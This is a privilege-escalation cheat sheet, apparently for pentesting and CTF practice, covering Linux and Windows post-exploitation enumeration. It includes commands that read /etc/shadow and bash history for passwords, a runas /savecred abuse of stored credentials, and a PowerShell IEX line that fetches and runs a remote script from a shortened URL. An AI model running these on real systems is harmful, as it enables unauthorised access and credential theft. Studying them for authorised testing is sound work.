Privilege Escalation Reference

What’s in this document?

  • Linux Privesc
  • Windows Privesc
  • Escalation scripts

Situational Awareness

When you pop a shell on a Linux box, a Windows box, or some other obscure OS, you need to get your bearings very quickly and figure out what sort of access you have, what sort of system it is, and how you can move around.

Hopefully from your recon, you should already know what operating system you’re working on, but occasionally you might just know “it’s unix-like of some sort”.

If you’re doing HackTheBox, be sure to evaluate all of these things 😉

Linux/Unix

What user am I?

This will tell you two things instantly: which user you are running as, and whether your shell is indeed running some sort of bash.

whoami && id

Dump all environment variables

This might reveal if you’re inside a container or not.

env

Get Kernel Version and Information

You might get lucky and find a kernel that is vulnerable to a known Linux privesc. This will also give you some insight into your OS.

uname -a

What is the hostname?

If it looks something like: “de0921daed50” you might be inside a docker container.

hostname

Am I inside a docker container?

This is important information. This will change your attack tactics.

cat /proc/1/cgroup

If you’re inside a normal VM, it’ll look like this:

vagrant@ubuntu-13:~$ cat /proc/1/cgroup
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/
5:memory:/
4:cpuacct:/
3:cpu:/
2:cpuset:/

If you’re in a container, it might look like this:

vagrant@ubuntu-13:~$ docker run busybox cat /proc/1/cgroup
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
5:memory:/
4:cpuacct:/
3:cpu:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
2:cpuset:/
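The check above as a reusable function, as an added example that is not part of the original page. It classifies a cgroup file in the `id:controllers:path` format shown above; the `lxc` and `kubepods` markers are assumptions beyond the page's `/docker/` case, and a cgroup v2 file (a single `0::` line) is reported as inconclusive because it can read `0::/` on a host and in a container alike. The sample inputs are constructed from the two outputs above.

```shell
#!/bin/sh
# Added example: classify a cgroup file (one "id:controllers:path" per line).
# Prints one of: container | host | inconclusive
cgroup_verdict() {
    file="${1:-/proc/1/cgroup}"
    [ -r "$file" ] || { echo "inconclusive"; return 0; }
    paths=$(cut -d: -f3- "$file")
    # /docker/ is the marker shown on the page; lxc and kubepods are
    # assumed extra markers for other container runtimes.
    if printf '%s\n' "$paths" | grep -Eq '/(docker|lxc|kubepods)'; then
        echo "container"
    elif grep -q '^0::' "$file" && ! grep -qv '^0::' "$file"; then
        # cgroup v2 only: a single unified "0::<path>" line. With a private
        # cgroup namespace a container also sees "0::/", so do not guess.
        echo "inconclusive"
    else
        echo "host"
    fi
}

# Constructed samples, shortened from the two outputs shown above.
sample_host() { printf '%s\n' '11:name=systemd:/' '6:devices:/' '3:cpu:/'; }
sample_docker() {
    cid=3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
    printf '%s\n' '11:name=systemd:/' "6:devices:/docker/$cid" '5:memory:/'
}
sample_v2() { printf '%s\n' '0::/'; }

demo() {
    tmp=$(mktemp -d) || return 1
    sample_host > "$tmp/host"
    sample_docker > "$tmp/docker"
    sample_v2 > "$tmp/v2"
    for f in host docker v2; do
        printf '%-7s %s\n' "$f" "$(cgroup_verdict "$tmp/$f")"
    done
    rm -rf "$tmp"
}
demo
```
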

What programs are installed?

Feel free to extend this list however you like; the accessible executables will be returned along with their paths.

for item in iptables id ifconfig ip netstat arp tmux perl python ruby ls gcc wget; do which "$item"; done

Is my $PATH reliable?

You might find that your shell hasn’t got a properly set PATH. This will massively impact what applications you have access to.

echo $PATH

What directories contain binaries?

If your path is inaccurate, or you’re having trouble executing commands, this will save your day.

find . -executable | rev | cut -d "/" -f 2-200 | rev | sort | uniq

Or if you want to grep for bin folders.

find . -executable | rev | cut -d "/" -f 2-200 | rev | sort | uniq | grep bin

Writable files or directories outside of your home directory

find / -writable -type f -o -writable -type d 2>/dev/null | grep -Ev "^(/proc|/home/user|/tmp)"

Files that were edited in the last 10 minutes

Is somebody actively working on the machine?

find / -mmin -10 2>/dev/null | grep -Ev "^/proc"

What is running?

Does anything pop out here?

ps -ef
ps -ef | grep root
ps aux

Are there any files with SUID/SGID permission bits?

find / -type f \( -perm -g=s -o -perm -u=s \) 2>/dev/null
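A defender's view of the same search, as an added example that is not part of the original page: list setuid/setgid regular files and report any that are missing from a reviewed baseline. The function names, the baseline file and the sample tree are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit setuid/setgid files against a reviewed baseline.

# List regular files with the setuid (4000) or setgid (2000) bit set.
# The parentheses make -type f apply to both tests, so setgid
# directories are not reported. Octal is the same as -u=s / -g=s.
list_special_bits() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# Print files found under $1 that are not listed in baseline file $2
# (one absolute path per line). Prints nothing when everything is known.
unexpected_special_bits() {
    list_special_bits "$1" | grep -Fxv -f "$2" || true
}

# Constructed sample tree: one setuid file, one setgid file, one plain
# file and one setgid directory.
make_sample_tree() {
    d=$(mktemp -d) || return 1
    mkdir "$d/sgid_dir"
    for f in passwd_like helper plain; do : > "$d/$f"; done
    chmod 4755 "$d/passwd_like"
    chmod 2755 "$d/helper"
    chmod 0755 "$d/plain"
    chmod 2775 "$d/sgid_dir"
    echo "$d"
}

tree=$(make_sample_tree)
printf '%s\n' "$tree/passwd_like" > "$tree/baseline"   # reviewed and accepted
unexpected_special_bits "$tree" "$tree/baseline"       # prints only .../helper
rm -rf "$tree"
```
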

Unix Capabilities

Unix has the ability to supply certain capabilities on different binaries. This has been a rooting method for reading files in many different CTFs and challenges.

From the / directory, run this.

getcap -r / 2>/dev/null

https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux

Where can you write to?

This will find world writable directories.

find / \( -perm -o=w -perm -o=x \) -type d 2>/dev/null

Any hashes?

cat /etc/shadow
cat /etc/passwd

Can you use sudo?

It might be simpler than you think!

sudo -l
sudo -s
cat /etc/sudoers

Has a user tripped up and left their password?

cat .bash_history | grep sudo
cat .bash_history | less

pspy

Download pspy:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy32s

Once downloaded, chmod +x pspy32s and run it with ./pspy32s. This will take over the entire terminal or shell, so be sure to start another shell if you’re intending on doing some more poking around! Too many times have I started pspy only to Ctrl+C when I had what I was looking for and lose my shell. Infuriating. For reference, you can launch a Perl reverse shell [like so](https://navisec.io/reverse-shell-reference/#perl).

pspy will monitor running processes; typically this will pick up things like cronjob scripts and the like. I recommend performing actions such as clicking around webapps on the box or ssh’ing in.


Windows

Unquoted Services

This occurs when a service’s executable path contains spaces and is not enclosed in quotes, so the service path is not specified unambiguously.

C:\> wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

Find write-access

C:\> icacls "C:\Program Files\Some Folder"

Services

C:\> sc stop [service name]
C:\> sc start [service name]

Unattended Installs

There is a process called ‘Unattended installs’ where system administrators can automate the installation of Windows. They usually leave an `unattended.xml` file behind. It will often contain configuration settings as well as the Administrator credentials! Other files might include sysprep.xml.

Stored Credentials

Something that is used occasionally in CTFs is stored credentials using runas. For example, the following will show stored credentials:

cmdkey /list

And this will execute your executable:

runas /profile /savecred /user:ACCESS\Administrator "C:\Users\security\archive.exe"

Downloading files

Not so much a privesc tip, but certainly useful.

powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile(\"http://127.0.0.1:8080/file.exe\", \"C:\Users\user\file.exe\")"

PowerUp

A great tool for Windows Privilege escalation is PowerUp.

From Powershell:

IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")

After a download:

Import-Module "$(Get-Location)\PowerUp.ps1"

Running:

Invoke-AllChecks

You can find a good cheat sheet for PowerUp [here](https://blog.certcube.com/powerup-cheatsheet/).
